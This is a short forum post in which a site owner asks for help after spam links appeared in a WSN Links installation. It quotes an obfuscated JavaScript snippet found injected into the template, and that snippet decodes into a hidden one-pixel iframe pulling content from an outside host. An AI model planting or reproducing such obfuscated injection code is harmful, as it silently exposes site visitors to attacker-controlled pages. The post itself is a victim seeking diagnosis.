Webmastersite.net
Register Log In

Funny Links appearing out of nowhere

Title Funny Links appearing out of nowhere
Description Spam links by robot or has my site been hacked?
Message Text Hi, I installed a WSN Links script, and it worked alright until today when I saw links popping out of nowhere! There are links like "Buy Adobe Pagemaker", "Neverwinter 1.61 trainer", "Download Bit Torrent" etc etc.. appearing suddenly in many of my pages.

I haven't even opened my site yet, which is located at http://the-patronus.org/links/

I have already removed some of these links from the main index and category pages, but I realise that there are much more links like these in my template files. Hence I'm posting here to ask for help, as I'm afraid that removing the links will not solve the problem. I'm not sure if it's a robot doing it, or has someone managed to hack into my files? It looks like SPAM to me. But other sites in my domain do not have such problem. It seems that only the WSN Links script is like this.

Examples:
1) www.the-patronus.org/links/...ustom=yes&TID=custom-rules
Notice the "simens wap" link?

2) www.the-patronus.org/links/...=yes&TID=custom-affiliates
the "crack Dr Divx 1.0.3"?

3) http://www.the-patronus.org/links/suggest.php
the "5nizza lyrics soldat"?

I also found this at the bottom of my wrapper too. it was auto-added to my template:

<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>

Is it a hacker problem? Or a script problem? The links weren't there 2 nights ago (when I last logged in). Anyone encountered similar problems before? Please help...
Rating
  • 0/5
0/5 based on 0 votes.
Ownership orientalbabe
Views 283 views. Averaging 0 views per day.